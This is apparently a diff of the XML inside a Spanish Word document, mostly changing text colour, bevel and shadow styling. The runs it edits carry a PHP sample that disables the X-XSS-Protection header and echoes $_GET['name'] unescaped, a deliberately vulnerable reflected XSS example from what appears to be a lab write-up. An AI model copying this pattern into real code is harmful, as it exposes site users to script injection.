+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64983A09" wp14:editId="361B1DF8">
+            <wp:extent cx="5459095" cy="1125940"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
+            <wp:docPr id="214380031" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -882,7 +882,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1589748064" name=""/>
+                    <pic:cNvPr id="214380031" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -894,7 +894,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="1205230"/>
+                      <a:ext cx="5475310" cy="1129284"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -983,20 +983,21 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>(&lt;?</w:t>
@@ -1005,88 +1006,112 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>php</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> y cierre (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>php)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>?&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> del script PHP.</w:t>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>y cierre</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (?&gt;)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>del script PHP.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1110,18 +1135,19 @@
         <w:rPr>
           <w:rStyle w:val="CdigoHTML"/>
           <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
         </w:rPr>
         <w:t>header ("X-XSS-Protection: 0");</w:t>
       </w:r>
@@ -1129,16 +1155,17 @@
         <w:rPr>
           <w:rStyle w:val="CdigoHTML"/>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -1370,6 +1397,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
           <w:kern w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -1429,6 +1457,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
           <w:kern w:val="0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -1495,19 +1524,20 @@
         <w:rPr>
           <w:rStyle w:val="CdigoHTML"/>
           <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
         </w:rPr>
         <w:t>if( array</w:t>
       </w:r>
@@ -1516,19 +1546,20 @@
         <w:rPr>
           <w:rStyle w:val="CdigoHTML"/>
           <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
         </w:rPr>
         <w:t>_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != </w:t>
       </w:r>
@@ -1536,36 +1567,38 @@
         <w:rPr>
           <w:rStyle w:val="CdigoHTML"/>
           <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
         </w:rPr>
         <w:t>NULL )</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -1573,18 +1606,19 @@
         <w:rPr>
           <w:rStyle w:val="CdigoHTML"/>
           <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
         </w:rPr>
         <w:t> {</w:t>
       </w:r>
@@ -1592,16 +1626,17 @@
         <w:rPr>
           <w:rStyle w:val="CdigoHTML"/>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -1681,20 +1716,21 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t xml:space="preserve">echo '&lt;pre&gt;Hello </w:t>
@@ -1703,20 +1739,21 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>' .</w:t>
@@ -1725,130 +1762,70 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>$_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>GET[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
           <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
             <w14:prstDash w14:val="solid"/>
             <w14:round/>
           </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>GET[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
-          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:round/>
-          </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'name' ] . </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:round/>
-          </w14:textOutline>
-          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
-            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
-          </w14:props3d>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>'&lt;/pre&gt;';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:color w:val="FFC000" w:themeColor="accent4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
